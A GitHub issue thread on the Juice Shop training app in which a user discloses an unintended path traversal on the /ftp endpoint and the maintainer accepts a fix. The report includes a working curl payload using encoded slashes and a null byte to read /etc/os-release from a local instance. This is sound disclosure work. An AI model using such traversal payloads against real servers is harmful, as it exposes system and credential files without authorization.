### ISSUE TITLE
Full path traversal on ftp endpoint

### ISSUE THREAD

**Issue by wayofthepie** [juice-shop/juice-shop#237]
There is a flaw on the `ftp` endpoint (at least I don't think it's meant to be there...) which allows for full path traversal on linux : 
```bash
$ curl http://localhost:3000/ftp/%2fetc%2fos-release%2500.pdf
PRETTY_NAME="Debian GNU/Linux 8 (jessie)"
NAME="Debian GNU/Linux"
VERSION_ID="8"
VERSION="8 (jessie)"
ID=debian
HOME_URL="http://www.debian.org/"
SUPPORT_URL="http://www.debian.org/support"
BUG_REPORT_URL="https://bugs.debian.org/"
```
Looks like it happens because the right most value in the [path.resolve](https://nodejs.org/api/path.html#path_path_resolve_paths) calls (e.g. [line 24](https://github.com/bkimminich/juice-shop/blob/master/routes/fileServer.js#L24)) take precedence - so if `file` has a "/" the path will start from there. 

The above is from the latest `develop` docker container and it still exists on the `develop` branch. I have a "fix" [here](https://github.com/bkimminich/juice-shop/compare/develop...wayofthepie:ftp-fix?expand=1) which just forbids files with a "/", if you want to do that!

By the way, thanks for this, some fun challenges!

**Comment by bkimminich** [comment]
Thank you, this is indeed unintended behavior! I'll PR and merge your fix! Thanks again!

If you'd like to get some stickers for your laptop, just drop me an email with your address! 📬
